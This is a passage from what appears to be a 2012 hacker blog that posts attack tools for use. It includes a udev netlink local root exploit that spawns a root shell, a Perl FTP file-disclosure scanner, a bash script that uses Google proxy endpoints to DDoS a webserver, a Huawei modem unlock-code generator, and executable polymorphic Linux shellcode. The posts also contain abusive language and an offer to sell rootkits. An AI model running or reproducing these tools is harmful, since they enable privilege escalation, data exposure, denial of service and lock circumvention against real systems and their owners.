 *   An alternate version of kcope's exploit.  This exploit leverages the
 *   95-udev-late.rules functionality that is meant to run arbitrary commands
 *   when a device is removed.  A bit cleaner and reliable as long as your
 *   distro ships that rule file.  The exploit will execute /tmp/run as root
 *   so throw whatever payload you want in there.
 *   Pass the PID of the udevd netlink socket (listed in /proc/net/netlink,
 *   usually is the udevd PID minus 1) as argv[1].
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

int main(int argc, char **argv) {
int sock;
char *mp;
char message[4096];
struct msghdr msg;
struct iovec iovector;
struct sockaddr_nl address;
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(sock, (struct sockaddr *) &address, sizeof(address));
mp = message;
mp += sprintf(mp, "a@/d") + 1;
mp += sprintf(mp, "SUBSYSTEM=block") + 1;
mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
mp += sprintf(mp, "TIMEOUT=10") + 1;
mp += sprintf(mp, "ACTION=remove") +1;
mp += sprintf(mp, "REMOVE_CMD=bin/sh -i") +1;  //-- root cmd here
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock, &msg, 0);
close(sock);
return 0;
}

XD

comments: 0 » tags: , ,

G6 FtpServer file disclosure vuln script [some perl code to play with] #HAXNET

Posted on 6th January 2012 in Exploits, Uncategorized

G6 Ftp Server file disclosure vulnerability script here, for anyone fuzzing with G6….seems to be very Big userbase with windows forsue..
ENJOY!

######HAXNET
#!/usr/bin/perl
# G6 Ftp Server file disclosure vulnerability script
use Getopt::Std;
use IO::Socket;

getopts('h:l:p:',\%args);
my ($CRLF,$port,$login,$pass,$sock_res,$win_base,$iis_base,@drives);
$CRLF = "\015\012";
@drives = ("c","d","e","f","s","h","x","i","j");    ## added usb thumb/sdcard/miscro-hubs etc support and laptop/ipad
$port = 21;
$login = 'anonymous';     ## change this if want but this is good for Fingerprint on ranges...with me
$pass = 'anonymous';      ## again this should be changed like sometimes its user@localhost.net ,idk
if (defined $args{h}) {
$host = $args{h};
} else {
print "[-] No host specified.\n";
exit;
}
if (defined $args{l}) {
$login = $args{l};
}
if (defined $args{p}) {
$pass = $args{p};
}
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) || die("[-] Socket error: $!");
$sock_res = <$sock>;
print $sock "USER $login" . $CRLF;
$sock_res = <$sock>;
print $sock "PASS $pass" . $CRLF;
$sock_res = <$sock>;
if ($sock_res !~ /230\s/) {
print "[-] Login/pass not accepted..exiting.\n";
close($sock);
exit;
}
print $sock "PWD" . $CRLF;
$sock_res = <$sock>;
if (lc($sock_res) !~ /\/[a-z][:]\//) {
print "[-] Looks like 'show relative path' is enabled..exiting.\n";
close($sock);
exit;
}
print "[+] Attempting to locate system files..";
$win_base = &FindWindows;
$iis_base = &FindIIS;
print "[!] DONE.\n\n";
close($sock);
print "[!] Windows directory: $win_base\n";
print "[!] Hints to IIS path: $iis_base\n";
exit;

sub FindWindows {
my @win_dirs = ("win","windows","winnt","winme","windows.0");  ## added a cpl here wich were missing, could also be updated more..
foreach $drive (@drives) {
foreach $dir (@win_dirs) {
print ".";
print $sock "SIZE
/$drive:/$dir/regedit.exe" . $CRLF;
$sock_res = <$sock>;
if ($sock_res =~ /213\s/) {
return("$drive:\\$dir");}
}
}
return("[x] Not found");
}

sub FindIIS {
my @iis_files = ("Inetpub/wwwroot/_vti_inf.html","Inetpub/Adminscripts/adsutil.vbs","Inetpub/wwwroot/default.asp");
foreach $drive (@drives) {
foreach $file (@iis_files) {
print ".";
print $sock "SIZE /$drive:/$file" . $CRLF;
$sock_res = <$sock>;
if ($sock_res =~ /213\s/) {
$file =~ s/\//\\/g;
return("$drive:\\$file");
}
}
}
return("[x] Not found");
}

Enjoy,
XD@#HAXNET@EF

comments: 0 » tags: ,

TOOL: [Lame] +DDoS Against Webservers by IHTeam (Actual CVE bug ddos) BASH SCRUPTFILE

Posted on 6th January 2012 in Exploits

g+ dd0s attack againt apache and other webservers..forgot the exact ones…. lme but, was not publicly put out there well..so fixed cpl typos and rlsd it on CC… njoy skids :P ~
xd caters for all ppls needs :P 

#!/bin/bash
# Bug found by Simone 'R00T_ATI' Quatrini,Mauro 'epicfail' Gasperini
# Site: http://www.ihteam.net

function start {
echo "[*] Sending `echo $2` Requests .."
for a in `seq $2`
do
id=$((RANDOM%3999999+3000000))
nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
done
echo "[*] Still attacking `echo $urlclear`"
echo "[*] Sleeping for 10Secs"
sleep 10
start url $2 urlclear
}
echo ''
echo '             88888888ba,    88888888ba,                  ad88888ba  '
echo '    aa      88      `"8b   88      `"8b                d8"     "8b  '
echo '    88      88        `8b  88        `8b               Y8,          '
echo 'aaaa88aaaa  88         88  88         88   ,adPPYba,   `Y8aaaaa,    '
echo '""""88""""  88         88  88         88  a8"     "8a    `"""""8b,  '
echo '    88      88         8P  88         8P  8b       d8          `8b  '
echo '    ""      88      .a8P   88      .a8P   "8a,   ,a8"  Y8a     a8P  '
echo '            88888888Y""    88888888Y""     `"YbbdP""    "Y88888P"'
echo ''
if [ "$#" -lt 2 ]; then
echo "Usage: $0 <Big file> <Requests>"
echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
echo ""
exit 0
fi
case $2 in *[!0-9]* )  echo "$2 is not numeric" && exit 1;;
esac
echo "Attacking -> $1"
match1=/
repl1=%2F
match2=:
url=$1
urlclear=$1
url=${url//$match1/$repl1}
url=${url//$match2/$repl2}
echo ""
echo "[*] Loop started! CTRL+C to stop .."
echo ""
start url $2 urlclear

Have phun
XD / #HAXNET@EF

comments: 0 » tags: ,

Huawei E585 and Other Huawei modem unlock code calculator v1.1

Posted on 6th January 2012 in Android, Codes, Papers

This, was being searched for by me for ages.. finally was able to get hold of some older code and play around with stack values, i will be adding a targets base to it soon, but for now, enjoy, thx to gunslinger for this, it was really needed,and, since i dont cover phone shit atall sofar, please readon.. this rocks, it really does,and, this is from personal use with this device the E585 only, it is a very very good thing to get to use if you can…for me, it was 28bux and, im unlocked :D
Enjoy
xd @ #haxnet / e fnet
DONT become a victim!

#!/usr/bin/python
#   Gunslinger <yudha.gunslinger@gmail.com> http://bit.ly/c0debreaker
import hashlib, string

__auth__      = "[MULTIPLE PPL]"
__date__      = "DEC 2011"
__version__   = "1.1"
__copyright__ = "Copyright (c) 2011"

class huawei_modem_unlocker(object):
"""
Instance variables:
Imei
Imei of the modem will be calculated
Default : '0'
Verbose
Display how algorithm Is working
Default : False
"""

def __init__(self, imei='0', verbose=False):
''' Huawei modem unlocker class constructor '''
self._imei      = imei
self._verbose   = verbose
self._md5u      = hashlib.md5(str(imei)+str('5e8dd316726b0335')).hexdigest()
self._md5f      = hashlib.md5(str(imei)+str('97b7bc6be525ab44')).hexdigest()
self._unlock_code   = ''
self._flash_code    = ''
self._width     = 21
self._w         = 10
self._header_format     = '%-*s%*s'
self._format            = '   %d  | %-*s | %*s  '

def xor_digits(self, source, counter):
''' Get a value and xoring it during looping iteration '''
digits = int('0x0'+source[0+counter:2+counter],16)  ^ \
int('0x0'+source[8+counter:8+2+counter],16)    ^ \
int('0x0'+source[16+counter:16+2+counter],16)  ^ \
int('0x0'+source[24+counter:24+2+counter],16)
return digits
def calc(self):
''' Process calculate with the algorithm (read teh code) '''
cnt = 0
cnt2 = 1
if self._verbose:
print "="*(self._width+13)
print " Iter."+"|"+ " Unlock byte "+"|"+" Flash byte "
print "-"*(self._width+13)
while cnt < 8:
digits_unlock = self.xor_digits(self._md5u, cnt)
digits_flash = self.xor_digits(self._md5f, cnt)
unlock_byte = string.zfill(hex(digits_unlock)[2:],2)
flash_byte = string.zfill(hex(digits_flash)[2:],2)
self._unlock_code = str(self._unlock_code)+str(unlock_byte)
self._flash_code = str(self._flash_code)+str(flash_byte)
if self._verbose: print self._format % (int(cnt2), self._width - self._w, self._unlock_code , self._w, self._flash_code)
cnt  +=2
cnt2 +=1
if self._verbose:
print "="*(self._width+13)
print "\nUNLOCK CODE = %d & %d | %d = %d" % (int('0x0'+self._unlock_code,16), 33554431, 33554432, eval("int('0x0'+self._unlock_code,16) & 33554431 | 33554432"))
print "FLASH CODE    = %d & %d | %d = %d\n" % (int('0x0'+self._flash_code,16), 33554431, 33554432, eval("int('0x0'+self._flash_code,16) & 33554431 | 33554432"))
self._unlock_code   = int('0x0'+self._unlock_code,16) & 33554431 | 33554432
self._flash_code    = int('0x0'+self._flash_code,16) & 33554431 | 33554432
return (self._unlock_code, self._flash_code)

def run(self):
''' Fire it up ! '''
self.calc()
return (self._unlock_code, self._flash_code)

if __name__ == '__main__':
print "\nHuawei modem unlock code calculator v.%s by %s \n" % (__version__, __auth__)
inpimei = raw_input("Please input modem IMEI: ")
cracker = huawei_modem_unlocker(inpimei)
a, b    = cracker.run()
print "\n-> IMEI           = %s" % (inpimei)
print "->   UNLOCK CODE    = %s" % (a)
print "->   FLASH CODE     = %s" % (b)

Now thats what you would call, awesome :> , you wont find this to easy again my friends.. pocketwifi is now unlockable at ALL levels so, please enjoy it…free , thanks to some smart reversing of hardware by gunslinger ,propes up for this and thanks..when all others failed, gslinger came thru for me :>
thanks to my channel on efnet and its members @ps and frineds..and, please, feel free to ppin anytime..Nw, note, this unlocks the modem so, you could now use it alongside your own isp and, thus you would have free wifi i believe… but, also note, this can handle a Android-ROM! Yes, or even, Ubuntu installed within it! On the e585, and other models, above it, have an awesome feature to add a shared sdcard, so users logged in, can actually share like a ftpd!
These wifi routers really do rock, i would not have gone thru this amount of crap to get a calulator happenin for this thing, and, have to now maybe check other models and update a few strings….so, it mght have a target list next time you see it :)
Again, this will handle a rom, or, work like a small os/router,and this means, you have basically, a 5 user (at the least) shell,and, thats only if you wish to allow 4 others on it, you could happily, connect thru it with your own shit..thats even very good reason to have this thing unlocked, it really works on, what phone isp is being used to access it, when it is unlocked, this means, no restrictions on any of its default.rules,wich are nice and changed by default on unlock..so, you could make a py object file? or a .pyc ? or just python file.py on the device sdcard,root of sdcard…just hook it up to the pc,copy file to its sdcard and root then, enjoy rom manager possibly? and, i know for fact it handles froyo rom, so that maybe where to startsearching on tht one :>
ENJOY PPL!
XD @ #HAXNET @ EFNET // Dont become a victim ..

comments: 0 » tags: , , , , , , , , , , , , , , , , , , , , , , , , , ,

Shellcode: 91 bytes Find all writeable folder in filesystem linux polymorphic shellcode

Posted on 6th January 2012 in Codes, Exploits

SHELLCODE CODE BELOW:

Just some nice people/coders stuff,awesome polymorphic generator… (btw soon will put back up the linux and bsd polymorphic portbind i have here somewhere from old website… anyhow…enjoy this shellcode, it is ubercool for stack leaks maybe to ;) or leveraging from one code type to another ? idc…your the coders here…btw, I would still probably be in the Coders comp, albeeit half entrants being of abit shifty and sideways attidtudes..peicllly the socalled nice guys…anyhow.. anyjoy the shit.. this shit, dont go to FD…and, thats why CC will NEVA ever, bow to bs like that crap… and fy0d0r , go funk yaself, for the backups my shit gave to you and, proper, hard and good solid fucking help…go screw yaself fag…this is second time you have faggoted about like that, i should pay you a nice slapping.
Anyhow.. enjoy the shellcode.. spit on lamer.. /me spitting hard.

////Untouched author code..works fine -xd tested

/*
Title  : Find all writeable folder in filesystem linux polymorphic shellcode
Name   : 91 bytes Find all writeable folder in filesystem linux polymorphic shellcode .
Date   : Sat Jun  17 21:27:03 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>

char shellcode[] =
   "\xeb\x11\x5e\x31\xc9\xb1\x43\x80\x6c\x0e\xff\x35\x80\xe9\x01"
   "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5"
   "\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87"
   "\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02"
   "\xb5\x96\x1d\x29\x34\x34\x34\x9b\x9e\xa3\x99\x55\x64\x55\x62"
   "\xa9\xae\xa5\x9a\x55\x99\x55\x62\xa5\x9a\xa7\xa2\x55\x6c\x6c"
   "\x6c";

int main(void) {
fprintf(stdout,"-> Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}

End 1337 shellcode and, i aint kidding it is fucking leet, and, it is coded for a REASON so, please, for those who think it is crap, wonder, why it was actually prvate shellcode for like, 2009 or so…fucking,….have to give these things out every now and then and, times are here….many links also, in my channel on efnet, of rootkits, other apps and, skynet kits etc, all the ‘leet’shit.. ill sell it, for, we will discuss this…maybe on efnet.
CHEERS!
XD
#HAXNET , #HAXSHELLS , #MAGUCSHELLS ,and cheers to the leet of the leet who are the @ps in #Haxnet, you want leet, you got it… bitchez.
Now go make something useful…ftw.
XD v2

comments: 0 » tags: , , , , , , , , , ,
« Previous